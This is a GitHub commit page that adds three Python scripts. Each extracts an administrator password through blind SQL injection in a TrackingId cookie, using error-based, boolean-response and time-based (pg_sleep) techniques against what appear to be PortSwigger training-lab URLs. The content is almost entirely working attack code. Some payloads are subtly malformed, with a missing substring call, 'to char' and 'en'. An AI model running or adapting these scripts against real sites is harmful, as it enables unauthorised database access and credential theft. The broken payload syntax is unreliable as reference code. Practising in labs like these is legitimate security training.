Skip to content

Commit 8d96e10

Browse files
committed
SQLi
1 parent 434945e commit 8d96e10

File tree

3 files changed

+161
-0
lines changed

3 files changed

+161
-0
lines changed

Blind_SQL_error.py

Lines changed: 53 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,53 @@
1+
#!/usr/bin/python3
2+
3+
from pwn import *
4+
5+
import requests, signal, time, pdb, sys, string
6+
7+
def def_handler(sig, frame):
8+
print("\n\n[!] Saliendo...\n")
9+
sys.exit(1)
10+
11+
# Ctrl+c
12+
signal.signal(signal.SIGINT, def_handler)
13+
14+
main_url = "http://0a4b007e0401649ac115430c007b00b9.web-security-academy.net"
15+
characters = string.ascii_lowercase + string.digits
16+
#string.printable cambiar
17+
18+
def makeRequest():
19+
20+
password = ""
21+
22+
p1 = log.progress("Brute force")
23+
p1.status("Initiating brute-force attack")
24+
25+
time.sleep(2)
26+
27+
p2 = log.progress("Password")
28+
29+
for position in range(1, 21):
30+
for character in characters:
31+
32+
cookies = {
33+
'TrackingId': "TrackingId=c8WPLgAK19wQMrGn'||(select case when(password,%d,1)='%s' then to char(1/0) else '' en from users where username='administrator')||'" % (position, character),
34+
'session': 'zqRDUFxuLgZvJZXzNJG6bGulmxHMHEoc'
35+
}
36+
37+
p1.status(cookies['TrackingId'])
38+
39+
r = requests.get(main_url, cookies=cookies)
40+
41+
if r.status_code == 500 : # codigo de estado
42+
password += character
43+
44+
p2.status(password)
45+
46+
break
47+
48+
if __name__ == '__main__':
49+
50+
makeRequest()
51+
52+
53+

Blind_SQL_response.py

Lines changed: 52 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,52 @@
1+
#!/usr/bin/python3
2+
from pwn import *
3+
4+
import requests, signal, time, pdb, sys, string
5+
6+
def def_handler(sig, frame):
7+
print("\n\n[!] Saliendo...\n")
8+
sys.exit(1)
9+
10+
# Ctrl+c
11+
signal.signal(signal.SIGINT, def_handler)
12+
13+
main_url = "http://0aed003f04b171d6c0d8733f007500a2.web-security-academy.net"
14+
characters = string.ascii_lowercase + string.digits
15+
#string.printable cambiar
16+
17+
def makeRequest():
18+
19+
password = ""
20+
21+
p1 = log.progress("Brute force")
22+
p1.status("Initiating brute-force attack")
23+
24+
time.sleep(2)
25+
26+
p2 = log.progress("Password")
27+
28+
for position in range(1, 21):
29+
for character in characters:
30+
31+
cookies = {
32+
'TrackingId' : "SShXhd6uxRNk8MKi' and (select substring(password,%d,1) from users where username='administrator')='%s" % (position, character),
33+
'session' : 'NpzSjVIK9dUjtKxgyQkwEJLSKJ5uj6Gy'
34+
}
35+
36+
p1.status(cookies['TrackingId'])
37+
38+
r = requests.get(main_url, cookies=cookies)
39+
40+
if "Welcome back!" in r.text:
41+
password += character
42+
43+
p2.status(password)
44+
45+
break
46+
47+
if __name__ == '__main__':
48+
49+
makeRequest()
50+
51+
52+

Blind_SQL_time.py

Lines changed: 56 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,56 @@
1+
#!/usr/bin/python3
2+
from pwn import *
3+
4+
import requests, signal, time, pdb, sys, string
5+
6+
def def_handler(sig, frame):
7+
print("\n\n[!] Saliendo...\n")
8+
sys.exit(1)
9+
10+
# Ctrl+c
11+
signal.signal(signal.SIGINT, def_handler)
12+
13+
main_url = "http://0aed003f04b171d6c0d8733f007500a2.web-security-academy.net"
14+
characters = string.ascii_lowercase + string.digits
15+
#string.printable cambiar
16+
17+
def makeRequest():
18+
19+
password = ""
20+
21+
p1 = log.progress("Brute force")
22+
p1.status("Initiating brute-force attack")
23+
24+
time.sleep(2)
25+
26+
p2 = log.progress("Password")
27+
28+
for position in range(1, 21):
29+
for character in characters:
30+
31+
cookies = {
32+
'TrackingId' : "SShXhd6uxRNk8MKi'||(select case when (password,%d,1)='%s' then pg_sleep(1.5) else pg_sleep(0) end from users where username='administrator')-- -" % (position, character),
33+
'session' : 'NpzSjVIK9dUjtKxgyQkwEJLSKJ5uj6Gy'
34+
}
35+
36+
p1.status(cookies['TrackingId'])
37+
38+
time_start = time.time()
39+
40+
r = requests.get(main_url, cookies=cookies)
41+
42+
time_end = time.time()
43+
44+
if time_end - time_start > 1.5:
45+
password += character
46+
47+
p2.status(password)
48+
49+
break
50+
51+
if __name__ == '__main__':
52+
53+
makeRequest()
54+
55+
56+

0 commit comments

Comments
 (0)